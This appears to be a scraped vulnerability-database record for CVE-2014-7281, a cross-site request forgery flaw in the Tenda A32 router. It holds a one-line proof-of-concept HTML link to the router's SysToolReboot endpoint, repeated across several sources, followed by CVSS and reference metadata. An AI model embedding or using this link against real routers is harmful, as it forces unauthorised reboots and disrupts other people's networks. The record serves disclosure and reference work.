ID PACKETSTORM:128671
Type packetstorm
Reporter zixian
Modified 2014-10-15T00:00:00
Description
`# Exploit Title: Tenda A32 Router CSRF Vulnerability(reboot the Router)
# CVE ID :CVE-2014-7281
# Date: 2014-10-10
# Exploit Author: zixian
# Vendor Homepage: http://tenda.com.cn/
# Software Link: http://tenda.com.cn/Catalog/Product/325
# Version: V5.07.53_CN
When the administrator login, click on the link below, the device will reboot。
<a href="http://192.168.2.1/goform/SysToolReboot">reboot</a>
`
{"id": "PACKETSTORM:128671", "type": "packetstorm", "bulletinFamily": "exploit", "title": "Tenda A32 Cross Site Request Forgery", "description": "", "published": "2014-10-15T00:00:00", "modified": "2014-10-15T00:00:00", "cvss": {"vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/", "score": 6.8}, "href": "https://packetstormsecurity.com/files/128671/Tenda-A32-Cross-Site-Request-Forgery.html", "reporter": "zixian", "references": [], "cvelist": ["CVE-2014-7281"], "lastseen": "2016-12-05T22:24:51", "viewCount": 2, "enchantments": {"score": {"value": 5.9, "vector": "NONE", "modified": "2016-12-05T22:24:51", "rev": 2}, "dependencies": {"references": [{"type": "cve", "idList": ["CVE-2014-7281"]}, {"type": "exploitpack", "idList": ["EXPLOITPACK:3DBAE9944836BD2EDA9399E466C3ED74"]}, {"type": "seebug", "idList": ["SSV:87355"]}, {"type": "exploitdb", "idList": ["EDB-ID:34969"]}, {"type": "zdt", "idList": ["1337DAY-ID-22753"]}], "modified": "2016-12-05T22:24:51", "rev": 2}, "vulnersScore": 5.9}, "sourceHref": "https://packetstormsecurity.com/files/download/128671/tendaa32-xsrf.txt", "sourceData": "`# Exploit Title: Tenda A32 Router CSRF Vulnerability(reboot the Router) \n# CVE ID :CVE-2014-7281 \n# Date: 2014-10-10 \n# Exploit Author: zixian \n# Vendor Homepage: http://tenda.com.cn/ \n# Software Link: http://tenda.com.cn/Catalog/Product/325 \n# Version: V5.07.53_CN \n \n \n \nWhen the administrator login, click on the link below\uff0c the device will reboot\u3002 \n \n \n<a href=\"http://192.168.2.1/goform/SysToolReboot\">reboot</a> \n \n`\n"}
{"cve": [{"lastseen": "2021-02-02T06:14:34", "description": "Cross-site request forgery (CSRF) vulnerability in Shenzhen Tenda Technology Tenda A32 Router with firmware 5.07.53_CN allows remote attackers to hijack the authentication of administrators for requests that reboot the device via a request to goform/SysToolReboot.", "edition": 4, "cvss3": {}, "published": "2014-10-23T14:55:00", "title": "CVE-2014-7281", "type": "cve", "cwe": ["CWE-352"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2014-7281"], "modified": "2014-10-24T13:02:00", "cpe": ["cpe:/h:tenda:a32:-", "cpe:/o:tenda:a32_firmware:5.07.53_cn"], "id": "CVE-2014-7281", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2014-7281", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}, "cpe23": ["cpe:2.3:o:tenda:a32_firmware:5.07.53_cn:*:*:*:*:*:*:*", "cpe:2.3:h:tenda:a32:-:*:*:*:*:*:*:*"]}], "exploitdb": [{"lastseen": "2016-02-04T00:19:08", "description": "Tenda A32 Router - CSRF Vulnerability. CVE-2014-7281. Webapps exploit for hardware platform", "published": "2014-10-14T00:00:00", "type": "exploitdb", "title": "Tenda A32 Router - CSRF Vulnerability", "bulletinFamily": "exploit", "cvelist": ["CVE-2014-7281"], "modified": "2014-10-14T00:00:00", "id": "EDB-ID:34969", "href": "https://www.exploit-db.com/exploits/34969/", "sourceData": "# Exploit Title: Tenda A32 Router CSRF Vulnerability(reboot the Router)\r\n# CVE ID :CVE-2014-7281\r\n# Date: 2014-10-10\r\n# Exploit Author: zixian\r\n# Vendor Homepage: http://tenda.com.cn/\r\n# Software Link: http://tenda.com.cn/Catalog/Product/325\r\n# Version: V5.07.53_CN\r\n\r\n\r\n\r\nWhen the administrator login, click on the link below\uff0c the device will reboot\u3002\r\n\r\n\r\n<a href=\"http://192.168.2.1/goform/SysToolReboot\">reboot</a>", "cvss": {"score": 6.8, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "sourceHref": "https://www.exploit-db.com/download/34969/"}], "zdt": [{"lastseen": "2018-03-14T14:32:12", "description": "Exploit for hardware platform in category web applications", "edition": 2, "published": "2014-10-14T00:00:00", "type": "zdt", "title": "Tenda A32 Router - CSRF Vulnerability", "bulletinFamily": "exploit", "cvelist": ["CVE-2014-7281"], "modified": "2014-10-14T00:00:00", "id": "1337DAY-ID-22753", "href": "https://0day.today/exploit/description/22753", "sourceData": "# Exploit Title: Tenda A32 Router CSRF Vulnerability(reboot the Router)\r\n# CVE ID :CVE-2014-7281\r\n# Date: 2014-10-10\r\n# Exploit Author: zixian\r\n# Vendor Homepage: http://tenda.com.cn/\r\n# Software Link: http://tenda.com.cn/Catalog/Product/325\r\n# Version: V5.07.53_CN\r\n \r\n \r\n \r\nWhen the administrator login, click on the link below\uff0c the device will reboot\u3002\r\n \r\n \r\n<a href=\"http://192.168.2.1/goform/SysToolReboot\">reboot</a>\n\n# 0day.today [2018-03-14] #", "cvss": {"score": 6.8, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "sourceHref": "https://0day.today/exploit/22753"}], "exploitpack": [{"lastseen": "2020-04-01T19:04:51", "description": "\nTenda A32 Router - Cross-Site Request Forgery", "edition": 1, "published": "2014-10-14T00:00:00", "title": "Tenda A32 Router - Cross-Site Request Forgery", "type": "exploitpack", "bulletinFamily": "exploit", "cvelist": ["CVE-2014-7281"], "modified": "2014-10-14T00:00:00", "id": "EXPLOITPACK:3DBAE9944836BD2EDA9399E466C3ED74", "href": "", "sourceData": "# Exploit Title: Tenda A32 Router CSRF Vulnerability(reboot the Router)\n# CVE ID :CVE-2014-7281\n# Date: 2014-10-10\n# Exploit Author: zixian\n# Vendor Homepage: http://tenda.com.cn/\n# Software Link: http://tenda.com.cn/Catalog/Product/325\n# Version: V5.07.53_CN\n\n\n\nWhen the administrator login, click on the link below\uff0c the device will reboot\u3002\n\n\n<a href=\"http://192.168.2.1/goform/SysToolReboot\">reboot</a>", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}], "seebug": [{"lastseen": "2017-11-19T13:10:00", "description": "No description provided by source.", "published": "2014-11-13T00:00:00", "type": "seebug", "title": "Tenda A32 Router - CSRF Vulnerability", "bulletinFamily": "exploit", "cvelist": ["CVE-2014-7281"], "modified": "2014-11-13T00:00:00", "href": "https://www.seebug.org/vuldb/ssvid-87355", "id": "SSV:87355", "sourceData": "\n # Exploit Title: Tenda A32 Router CSRF Vulnerability(reboot the Router)\r\n# CVE ID :CVE-2014-7281\r\n# Date: 2014-10-10\r\n# Exploit Author: zixian\r\n# Vendor Homepage: http://tenda.com.cn/\r\n# Software Link: http://tenda.com.cn/Catalog/Product/325\r\n# Version: V5.07.53_CN\r\n \r\n \r\n \r\nWhen the administrator login, click on the link below\uff0c the device will reboot\u3002\r\n \r\n \r\n<a href="http://192.168.2.1/goform/SysToolReboot">reboot</a>\n ", "sourceHref": "https://www.seebug.org/vuldb/ssvid-87355", "cvss": {"score": 6.8, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}]}